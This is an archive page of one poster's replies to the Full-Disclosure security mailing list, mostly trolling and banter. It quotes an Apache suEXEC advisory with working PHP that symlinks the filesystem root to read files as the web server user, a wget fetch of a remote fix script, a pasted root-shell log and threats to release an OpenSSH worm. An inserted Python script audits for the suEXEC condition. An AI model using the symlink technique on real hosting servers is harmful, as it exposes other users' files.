Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC

2014-03-17 Thread Gichuki John Chuksjonia
Ooh goodie, where and what happened to N3td3v, he used to crack me up :D :D








On 3/17/14, Mario Vilas mvi...@gmail.com wrote:
 ROFL



 On Mon, Mar 17, 2014 at 11:07 AM, T Imbrahim
 timbra...@techemail.com wrote:

 What drugs are you on Pedro Ribeiro I wonder ...?

 I express my views, if you don't like don't watch them. You responses so
 far have only been assy speculations so don't tell me Im wrong , and
 please
 don't say thing like that. I don't know who the other people is,  but
 what
 is true in security I support. Why you would Google my name ... ?

  Is the English language causing you ill effects?

 --- ped...@gmail.com wrote:

 From: Pedro Ribeiro ped...@gmail.com
 To: timbra...@techemail.com
 Cc: full-disclosure@lists.grok.org.uk, Michal Zalewski 
 lcam...@coredump.cx, mvi...@gmail.com, gynv...@coldwind.pl

 Subject: Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
 Date: Mon, 17 Mar 2014 09:24:08 +


 On 16 Mar 2014 23:36, T Imbrahim timbra...@techemail.com wrote:
 
  The thread read Google vulnerabilities with PoC. From my understanding
  it was a RFI vulnerability on YouTube, and I voiced my support that this
 is a vulnerability.
 
  I also explained a JSON Hijacking case as a follow up, and you said you
 didn't follow.  So I am just saying that treating security that way,
 there
 are other parties like NSA who welcome them happily.
 

 I think these guys - Alfred, Kirschbaum and Imbrahim are the OP's sock
 puppets.

 They are all first time posters from unusual free email providers jumping
 to defend the OP out of nowhere. If you search Google for their emails
 you
 only find references to this thread.

 They present similar (false and /or incorrect) arguments, talk about
 their
 extensive work experience, bash Google and its security team and send
 repeated emails with exactly the same text.

 This is turning into a madhouse... I hope this guy doesn't have access to
 a gun.

 Regards
 Pedro






 --
 There's a reason we separate military and the police: one fights the enemy
 of the state, the other serves and protects the people. When the military
 becomes both, then the enemies of the state tend to become the people.



-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Google vulnerabilities with PoC

2014-03-15 Thread Gichuki John Chuksjonia
How the hell did you ever think Google will honor this? By now they
could be fixing this issue, they hell don't care about you.



On 3/15/14, Georgi Guninski gunin...@guninski.com wrote:
 Is it possible with the help of Godwin's law
 this discussion moves offlist?

 --
 guninski

 On Thu, Mar 13, 2014 at 10:43:50AM +, Nicholas Lemonias. wrote:
 Google vulnerabilities uncovered...


 http://news.softpedia.com/news/Expert-Finds-File-Upload-Vulnerability-in-YouTube-Google-Denies-It-s-a-Security-Issue-431489.shtml




-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure

2013-08-10 Thread Gichuki John Chuksjonia
One thing u gotta remember most of the Admins who handle webservers in
a network are also developers since most of the organizations will
always need to cut on expenses, and as we know, most of the developers
will just look into finishing work and making it work. So if something
doesn't run due to httpd.conf, you will find these guys loosening
server security, therefore opening holes to the infrastructure.

Just my two cents


./Chucks















On 8/10/13, Kingcope isowarez.isowarez.isowa...@googlemail.com wrote:
 Uhh Hit em with a little Ghetto Gospel

 So am i less holy Because i Puff a blunt and Drink a Beer with my homies?

 Theres no Need for you to fear me if you Take your Time and Hear me Maybe
 you can learn to cheer me.
 It aint about Black and white cause we Human !!!
 Lord can you Hear me speaaak!!
 http://rapgenius.com/2pac-ghetto-gospel-lyrics

 On 09.08.2013 at 16:33, Kingcope
 isowarez.isowarez.isowa...@googlemail.com wrote:

 So the blackhat that Sits on ur Site and the site of ur company Since half
 a year  will stop at the point Where its technically incorrect and wont
 escalate to root because it doesnt have to do Anything with suexec. Its
 an Old vuln so let it stay , better for us and soon our Data on your
 boxes.

 Time to Write a Real Root exploit and dont waste the Time with sysadmins
 that know how to set a flag in httpd.conf   , apache devs included.

 On 09.08.2013 at 14:29, Kingcope
 isowarez.isowarez.isowa...@googlemail.com wrote:

 So what your Emails Tell me is better ignore this vulnerability. I dont
 Claim its a High severity Bug but if you Tell People to ignore it Because
 it isnt a vulnerability you are very much aiding the Chaos of insecurity
 in the Internet today. You Maybe have a Secure Setting but theres only
 you on the Planet. Attackers Look specifically for such Bugs to Open
 Servers. No Wonder we have compromises in a High Scale every Day due to
 this ignorance. My rant on that One.

 On 07.08.2013 at 21:49, king cope
 isowarez.isowarez.isowa...@googlemail.com wrote:

 Apache suEXEC privilege elevation / information disclosure

 Discovered by Kingcope/Aug 2013

 The suEXEC feature provides Apache users the ability to run CGI and SSI
 programs under user IDs different from the user ID of the calling web
 server. Normally, when a CGI or SSI program executes, it runs as the same
 user who is running the web server.
 Used properly, this feature can reduce considerably the security risks
 involved with allowing users to develop and run private CGI or SSI
 programs.

 With this bug an attacker who is able to run php or cgi code inside a web
 hosting environment and the environment is configured to use suEXEC as a
 protection mechanism, he/she is able to read any file and directory on the
 file-system of the UNIX/Linux system with the user and group id of the
 apache web server.

 Normally php and cgi scripts are not allowed to read files with the apache
 user-id inside a suEXEC configured environment.

 Take for example this apache owned file and the php script that follows.

 $ ls -la /etc/testapache
 -rw------- 1 www-data www-data 36 Aug  7 16:28 /etc/testapache
 only user www-data should be able to read this file.

 $ cat test.php
 <?php
  system("id; cat /etc/testapache");
 ?>

 When calling the php file using a webbrowser it will show...
 uid=1002(example) gid=1002(example) groups=1002(example)

 because the php script is run through suEXEC.
 The script will not output the file requested because of a permissions
 error.

 Now if we create a .htaccess file with the content...
 Options Indexes FollowSymLinks

 and a php script with the content...

 <?php
  system("ln -sf / test99.php");
  symlink("/", "test99.php"); // try builtin function in case when
  // system() is blocked
 ?>
 in the same folder

 ..we can access the root filesystem with the apache uid,gid by
 requesting test99.php.
 The above php script will simply create a symbolic link to '/'.

 A request to test99.php/etc/testapache done with a web browser shows..
 voila! read with the apache uid/gid

 The reason we can now read out any files and traverse directories owned by
 the apache user is because apache httpd displays symlinks and directory
 listings without querying suEXEC.
 It is not possible to write to files in this case.

 Version notes. Assumed is that all Apache versions are affected by this
 bug.

 apache2 -V
 Server version: Apache/2.2.22 (Debian)
 Server built:   Mar  4 2013 21:32:32
 Server's Module Magic Number: 20051115:30
 Server loaded:  APR 1.4.6, APR-Util 1.4.1
 Compiled using: APR 1.4.6, APR-Util 1.4.1
 Architecture:   32-bit
 Server MPM: Worker
 threaded: yes (fixed thread count)
  forked: yes (variable process count)
 Server compiled with
 -D APACHE_MPM_DIR=server/mpm/worker
 -D APR_HAS_SENDFILE
 -D APR_HAS_MMAP
 -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
 -D APR_USE_SYSVSEM_SERIALIZE
 -D 
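
An audit for the condition the quoted advisory describes, added here as an example and not part of any message in the thread: it walks a hosting document root and reports symlinks that resolve outside it, plus .htaccess files whose Options line turns on FollowSymLinks. The function names, the finding labels and the sample tree (built in a temporary directory) are constructed for illustration; POSIX paths are assumed.

```python
import os
import tempfile


def htaccess_enables_followsymlinks(path):
    """Return True if the last relevant Options token in this .htaccess
    leaves FollowSymLinks switched on (simplified reading of the file)."""
    enabled = False
    with open(path, "r", errors="replace") as fh:
        for raw in fh:
            words = raw.split()
            if not words or words[0].startswith("#"):
                continue
            if words[0].lower() != "options":
                continue
            for opt in words[1:]:
                name = opt.lstrip("+-").lower()
                if name in ("followsymlinks", "all"):
                    # "-FollowSymLinks" switches it off, anything else on
                    enabled = not opt.startswith("-")
                elif name == "none":
                    enabled = False
    return enabled


def audit_docroot(docroot):
    """Return sorted findings as (kind, path relative to docroot, target)."""
    root = os.path.realpath(docroot)
    findings = []
    # followlinks=False: symlinked directories are listed but not entered
    for dirpath, dirnames, filenames in os.walk(docroot, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, docroot)
            if os.path.islink(path):
                target = os.path.realpath(path)
                # A link is suspicious when its resolved target is not
                # underneath the document root being audited.
                if os.path.commonpath([root, target]) != root:
                    findings.append(("symlink-escapes-docroot", rel, target))
            elif name == ".htaccess" and htaccess_enables_followsymlinks(path):
                findings.append(("htaccess-followsymlinks", rel, None))
    return sorted(findings, key=lambda f: (f[0], f[1]))


def build_constructed_sample(base):
    """Create a constructed sample tree mirroring the advisory's layout."""
    site = os.path.join(base, "docroot", "example")
    os.makedirs(os.path.join(site, "safe"))
    with open(os.path.join(site, ".htaccess"), "w") as fh:
        fh.write("Options Indexes FollowSymLinks\n")
    # The link from the advisory: test99.php pointing at the filesystem root
    os.symlink("/", os.path.join(site, "test99.php"))
    with open(os.path.join(site, "index.php"), "w") as fh:
        fh.write("<?php ?>\n")
    # A harmless link that stays inside the document root
    os.symlink(os.path.join(site, "index.php"),
               os.path.join(site, "safe", "home.php"))
    with open(os.path.join(site, "safe", ".htaccess"), "w") as fh:
        fh.write("# hardened\nOptions -FollowSymLinks +SymLinksIfOwnerMatch\n")
    return os.path.join(base, "docroot")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as base:
        for kind, rel, target in audit_docroot(build_constructed_sample(base)):
            print(kind, rel, target or "")
```

On the server side, Apache's SymLinksIfOwnerMatch option and an AllowOverride setting that does not let .htaccess files change Options are the httpd.conf controls that address what this audit reports.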

Re: [Full-disclosure] Botnet using Plesk vulnerability and takedown

2013-06-08 Thread Gichuki John Chuksjonia
What happened to the link.

On 6/8/13, kai k...@rhynn.net wrote:
 wget http://botslayer.ru/final_solution.txt

 i've registered this domain just to save incompetent shitheads who blindly

 run any code which is supposed to fix security problem. why have you
 included the non-existent domain in your code?

 thanks for your interesting investigation anyway.


 Cheers,

 Kai




-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] LulzSec EXPOSED!

2011-06-06 Thread Gichuki John Chuksjonia
I think its just a bruteforce.




On 6/6/11, Andreas Bogk andr...@andreas.org wrote:
 Excerpts from lulzfail's message of Mo Jun 06 08:39:42 +0200 2011:
 Lulzsec == pwnt

 I've seen the log you pasted to pastebin.  Is this:

  * A timing attack on ssh passwords over the net?
  * Fake, to distract us from your real 0day?

 Andreas

 Log:

 root@gibson:~# ./1337hax0r 204.188.219.88 -root
 Attempting too hax0r root password on 204.188.219.88

 Password hax0rd! root password: M8eCvSLhkTe

 root@gibson:~# ssh 204.188.219.88

 root@204.188.219.88's password:

 root@xyz:~# hostname; id; w
 xyz
 uid=0(root) gid=0(root) groups=0(root)




-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] 10 OpenBSD facts and is timeline of Backdoor

2010-12-16 Thread Gichuki John Chuksjonia
God, i cant even understand half the shit he is saying? English so upside down!





On 12/17/10, Christian Sciberras uuf6...@gmail.com wrote:
 HAHAHAHAHAH!!

 GOD so are funny you!11




 2010/12/16 musnt live musntl...@gmail.com

 OpenBSD is Backdoor facts

 1) Is we look to monkey.org posting, we is see Theo make is change to
 CVS for this portion of code is work on by Jason (name is mentioned by
 Perry)

 2) Is we look at timeframe for Backdoor, is code be in 2.5 or 2.6,
 musn't live theorize 2.6

 * 2.6: December 1, 1999 -
 * Based on the original SSH suite and developed further by the OpenBSD
 team, 2.6 saw the first release of OpenSSH, which is now available
 standard on most Unix-like operating systems and is the most widely
 used SSH suite.

 http://en.wikipedia.org/wiki/Timeline_of_OpenBSD

 3) Is Theo not deny there is no backdoor, only say he is unaware
 (musn't live is unaware of exact time right now, is know time exist!)
   a) Theo and OpenBSD not audit anything (trusting trust)
   b) pre-emptive is wasn't me from Theo in event truth comes later
 Hey I is Theo I do right thing and strike err.. Disclose first! I not
 know!
   c) all of is the above

 4) While is everyone claim Perry прил, is no one else outside of Jason
 on OpenBSD is say: Perry is lying even former developers is stay
 quiet to protect the DARPA/FBI innocent

 5) Is possible at people by mentioned in named by Perry, go to Canada
 to hack code and plant is backdoor

 6) Old code (2.6) is sayanoruski. Is good luck find mirror. CVS is
 controlled by those is accused, quick move and we is have: See is no
 backdoor in this backdoor!

 7) OpenBSD is the most secure backdoored on the planet

 8) Is need slogan change: Only two remote holes in the default
 install, in a heck of a long time! (Is besides backdoor!!!)

 9) We is all peons to Theo and we is cannot figure out truth as we is
 brains are so too small

 10) Claims surpass is Microsoft NSA theory




-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/


Re: [Full-disclosure] Unbanning Andrew Wallace to protect global information intelligence

2010-03-21 Thread Gichuki John Chuksjonia
waoh. very funny.

On 3/21/10, Andrew Walberg andrew.walb...@rocketmail.com wrote:
 Hello.

 Everyone here has learned their lesson and has suffered because Andrew
 Wallace (n3td3v) has been banned.

 n3td3v is a multi-national organization of national security experts who
 have been driven to the underground thanks to John Cartwright. Since then,
 mossad has been able to infiltrate and cause significant global problems.

 n3td3v was offended and furious. He doesn't have 0day. He doesn't hack.

 Unban Andrew Wallace and let the information be free.

 If you unban him we will finally have justice in this world for n3td3v and
 his 5000 employees. Everyone at our office is waiting for your answer, John
 Cartwright




-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)

2010-01-04 Thread Gichuki John Chuksjonia
Especially the ones working for governments, the surveillance and
espionage etc, scares more

On 1/4/10, netinfinity netinfinity.security...@gmail.com wrote:
 I couldn't agree more with Adriel.

 --
 netinfinity




-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)

2010-01-02 Thread Gichuki John Chuksjonia
One of the amazing thing about these hackers calling them antisec
didn't have real hardening on their servers. Most of their servers had
direct public ip on their Interfaces and even their user management
was crappy.

I remember when  i heard of antisec i thot these guys were real gurus
with more than 10 years of experience, but after the fake sshd and
fake attacks, and DDOS that meant nothing and now all is lulz, i cant
help but rofl.


./Chuks

On 1/2/10, Jeff Blaum jblau...@gmail.com wrote:
 It still does not change the fact that you (Glafkos) are a cock, and that
 astalavista is (and was) always a shit stain of a website.

 J

 On Thu, Dec 31, 2009 at 9:38 AM, Glafkos Charalambous
 i...@infosec.org.uk wrote:


 http://www.anti-sec.com
 http://pastebin.com/f12f6f9c0
 http://pastebin.mozilla.org/694145
 http://pastebin.ca/1733192








-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] The Cyber War Conspiracy

2009-12-05 Thread Gichuki John Chuksjonia
K, full-disclos...@safe-mail.net or whoever you are, i think you are
watching too much of 24 or even Spooks. Please quit and relax abit!!!




./Chuks



On 12/5/09, Paul Schmehl pschmehl_li...@tx.rr.com wrote:
 --On December 4, 2009 10:44:20 PM -0600 valdis.kletni...@vt.edu wrote:


 On Fri, 04 Dec 2009 14:32:34 PST, Sam Haldorf said:

 n3td3v is probably ureleet, full-censorship, full-disclosure, antisec,
 jdl and valdis.

 He might be those other dudes, but he's not me.  If I was going to pose
 as
 a troll, I'd pose as a more clueful troll - trying to think that
 cluelessly
 makes my brain hurt.

 On the other hand, nobody's ever seen me and Paul Schmehl at the same
 place
 at the same time... I wonder why... :)

 Because we have no travel money.  :-)

 Paul Schmehl, If it isn't already
 obvious, my opinions are my own
 and not those of my employer.
 **
 WARNING: Check the headers before replying




-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] n3td3v mentioned in a book?

2009-10-04 Thread Gichuki John Chuksjonia
Maybe its not a Ban, maybe its a burn notice!







On 10/4/09, full-censors...@hushmail.com full-censors...@hushmail.com wrote:
 if this guy is mentioned in a book and we banned him?

 http://f0rb1dd3n.com/links.php

 i'm calling for a serious review of whats going on with the ban
 list.











-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] Modifying SSH to Capture Login Credentials from Attackers

2009-09-29 Thread Gichuki John Chuksjonia
Thank you for this my.hndl. There are some issues i have been having
and seems your methodology may work on Fedora and other OSs.

Thankx

./Chuks

On 9/30/09, maxigas maxi...@anargeek.net wrote:
 From: bo...@civ.zcu.cz bo...@civ.zcu.cz
 Subject: Re: [Full-disclosure] Modifying SSH to Capture Login Credentials
 from Attackers
 Date: Wed, 30 Sep 2009 00:03:51 +0200

 All standard users have read access to /var/log/auth, so if root

 they shouldn't, at least on my default debian they don't ...

 On my default Ubuntu, users in adm group have read access to the
 authentication log file:

 m...@machine: ls -l /var/log/auth.log
 -rw-r----- 1 syslog adm 46774 2009-09-30 01:10 /var/log/auth.log

 --
 ×× maxigas
 // villanypásztor / kiberpunk / web shepherd //

 -= Important communication disclaimer: by replying to my emails you are
 disclaiming all your disclaimers. =-



-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] n3td3v's Twitter account hacked

2009-09-19 Thread Gichuki John Chuksjonia
Just saw that. Thot were new trolls by n3td3v pouring all the way to twitter.


On 9/19/09, The Security Community thesecuritycommun...@gmail.com wrote:
 Someone evidently hacked into n3td3v's Twitter account and is spewing
 nonsense.

 http://twitter.com/n3td3v

 Maybe it's some sort of botnet CC account now, I dunno.




-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] Moar iProphet questions

2009-08-29 Thread Gichuki John Chuksjonia
Now, i think this is really wrong. There is no need of making fun of
someone who is disabled by attacking n3td3v.


On 8/29/09, Gary McKinnon john.wall...@hush.com wrote:
 iProphet (weev) Questions

 Sorry for being repetitive. FD is mostly hoarsechit and fucin
 around anyway (not that you do ANY of that).

 My name is Gary McKinnon, I'm the nerd that hacked into the
 Pentagon. I'm autistic so I may have difficulty communicating or
 understanding you.

 HELLO? Can you hear me?

 I CAN'T SEE THE SCREEN. LET ME TRY TO TYPE SOME QUEStions

 8==^H^H^H^H^HD

 1.) Do you have HIV?
 2.) Have you ever anointed anyone with your IRL Virus?
 3.) Do you think that you could be prosecuted for hacking if you
 give people your IRL badware?
 4.) Do the woman you give HIV to go to heaven?
 5.) What does your computer screen look like? You run linux? Do you
 have an iProphet wallpaper?
 6.) When will we be seeing new vlogcasts
 7.) Do you plan on writing some subversive PDF's for us?
 8.) Do you intend on making a documentary so it can go viral and
 cause a revolution?
 9.) In your mind, what is your picture of an ideal world?

 This post was by Gary McKinnon [SOLO], elite autistic hacker.




-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] http://secreview.blogspot.com -- end of life

2009-08-14 Thread Gichuki John Chuksjonia
Please bring it back. It was a nice blog, or send me an archive of the ut.

Thankx

./Chuks



On 8/13/09, secrev...@hushmail.me secrev...@hushmail.me wrote:
 Hi Everyone,

 We received a lot of emails from different people asking us what
 happened to our blog at http://secreview.blogspot.com. What
 happened is we decided to shut down operations because we don't
 have time to keep doing reviews. We also don't have time to redo
 reviews which is needed to keep the reviews fair. We all have full
 time jobs and recently have been traveling a lot.

 We started secreview because we wanted to expose security companies
 for what they really were. But now because we can't do it any more
 we don't think its fair that only some companies get reviewed and
 others don't. So we deleted the blog (but we have 90 days to bring
 it back if people want it).

 If we do bring it back, we will probably not do any more reviews
 and we will leave it up just because. Do people want the blog to be
 recovered or do they want us to keep it dead?

 -- Secreview




-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Redspin, Inc. (C+)

2009-08-13 Thread Gichuki John Chuksjonia
Just read this.

What happened to your blog, http://secreview.blogspot.com?



On 8/11/09, secreview secrev...@hushmail.com wrote:
 We received 22 requests from different people to perform a review of
 Redspin! Their website can be found at http://www.redspin.com. We
 haven’t done a review of anyone in quite a while, the last review that
 we did was for Pivot Point Security who got an A (we still recommend
 them). We apologize for this long delay but we have been very busy
 traveling (yes we still have jobs doing consulting work sometimes).

 As you can see from the comments that we received in other posts we
 have a lot of catch up work to do, but to be honest we are not sure
 that we will be able to do it. This review might be our final and last
 review depending on how much more travel we have. (We have lives, some
 of us have families, and we can’t keep doing this for free even though
 we feel that this is a great service).

 We did a lot of research on Redspin and we managed to get a copy of two
 reports that they did for two different customers. We won’t share those
 reports with you because that would be unethical, don’t ask.

 Redspin claims that it is a “pure penetration testing firm”. What they
 mean by “pure penetration testing” is that they do not resell third
 party software or hardware. They also say that “don't find problems on
 your network so that [they] can make more money; [their] penetration
 testing services reveal vulnerabilities, [that] will help you become
 more secure.”

 We verified their claim with our own research. Redspin will not try to
 sell you software or hardware… but they might try to sell you software
 as a service. (see their www.jetmetric.com website).

 Redspin takes it a step further and is brutally honest about their
 methodology for delivering penetration-testing services. They openly
 admit that their services rely on automated vulnerability scanners
 (Nessus) and are enhanced by manual testing. In fact, Redspin says that
 automated scanners “can miss about 40% of the security risk so they
 alone do not adequately assess risk. Furthermore, about half of the
 findings from a vulnerability scan are false positives”.

 Any security company that relies on automated scanners can weed out
 false positives, but doing that doesn’t really increase the depth and
 accuracy of testing. A false positive, also known as an error of the
 first kind, or a Type I Error, is the rejection of a null hypothesis
 when it is in fact true. In more simple terms, this is the error of
 observing a difference when in fact there isn’t one. Identifying false
 positives is fairly easily done, as it only requires inspecting the
 results produced by a scanner.

 But what about False Negatives? A False Negative, also called a Type II
 Error, or an error of the second kind, is the error of failing to
 reject a null hypothesis when it is in fact not true. More simply, a
 False Negative is the error of failing to observe a difference when in
 truth there is one. So, if an automated vulnerability scanner tests a
 vulnerable service (a known vulnerability) but the scanner doesn’t
 detect the vulnerability then the vulnerability is excluded from the
 report. If this is the case then Redspin’s methodology will break down
 because there will be no result in the report for Redspin to manually
 test. That vulnerability will fly under the Redspin radar but might not
 be missed by a hacker. So how many vulnerabilities does Redspin miss?
 It’s a question worth asking.

 Redspin does say that “vulnerability scanning is not suitable on its
 own as a complete or billable service offering, it does provides some
 value in the early reconnaissance phase of a more comprehensive
 External Network Security Assessment”. They have a typo in that
 sentence, but other than that, they are right. Vulnerability scanning
 does have a position in the industry and is a huge time saver,
 especially when testing large numbers of systems. Just don’t rely on
 one vulnerability scanner like Redspin does, use two or more like the
 OSSTMM proposes.

 Redspin says “manual analysis is at the heart of all of [their]
 assessments which not only gives you confidence that you have a
 complete view of your security risk, but provides tailored reporting
 and recommendations enabling simple work-arounds and cost-effective
 mitigation strategies for most security issues.” Based on our research
 Redspin’s “manual analysis” isn’t what we expected it to be. It is not
 based on vulnerability research and is strictly based on the inspection
 and verification of scanner output.

 What we can say is that their “manual analysis” doesn’t produce the
 highest quality reports that we’ve ever seen, but it does produce
 reports that are higher than average quality. The Redspin reports have
 very few, if any, False Positives but will contain more False Negatives
 than a report that is centered on solid (vulnerability) research.

 One thing that Redspin does 

Re: [Full-disclosure] AntiSec PHHEER #1 (anti...@hushmail.com)

2009-08-09 Thread Gichuki John Chuksjonia
i thought the same thing. This guy shud get a life!!!

On 8/9/09, Zloss aza...@gmail.com wrote:
 So what the heck are you doing dumbass ?

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] anti-sec: OpenSSH = 5.2 zero day exploit code - 48 hours until it is publicly released!

2009-07-20 Thread Gichuki John Chuksjonia
hahaha, now u r releasing it

I thought u guyz dont release or disclose vulnerabilities.

./Chuks

On 7/20/09, Ant-Sec Movement anti.sec.movem...@gmail.com wrote:
 Dear Reader,
 In 48 hours, the anti-sec movement will publicly unveil working exploit code
 and full details for the zero-day OpenSSH vulnerability we discovered. It
 will be posted to the Full-Disclosure security list.

 Soon, the very foundations of Information Technology and Information
 Security will be unearthed as millions upon millions of systems running ANY
 version of OpenSSH are compromised by wave after wave of script-kiddie and
 malicious hacker.

 Within 10 hours of the initial release of the OpenSSH 0-day exploit code,
 anti-sec will be unleashing powerful computer worm source code with the
 ability to automatically find and compromise systems running any and all
 versions of OpenSSH.

 This is an attack against all White Hat Hackers who think that running a
 Penetration Test simply searching for known vulnerabilities is all they have
 to do in order to receive their payment. Anti-sec will savor the moment when
 White Hat Hackers are made to look like fools in the eyes of their clients.

 Sincerely,

 -anti-sec



-- 
-- 
Gichuki John Ndirangu,
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/



Re: [Full-disclosure] n3td3v is posting as ant-sec

2009-07-16 Thread Gichuki John Chuksjonia
Hehehe, netdev? For real? He is the Anti-sec. I think that's wrong

On Thu, Jul 16, 2009 at 1:35 PM, Benjamin Cance cance.consult...@gmail.com wrote:
 now we know who antisec are/is, i'm going to bed

 Charles Majola wrote:
 HAH!

 I knew it

 On Thu, Jul 16, 2009 at 2:54 PM, Ureleeturel...@gmail.com wrote:

 careful.  n3td3v has found his way back onto the list.  he is now
 posting as ant-sec.  he is hacking and spreading disinformation on
 full-d.

 careful who you talk 2, he has many names.





-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
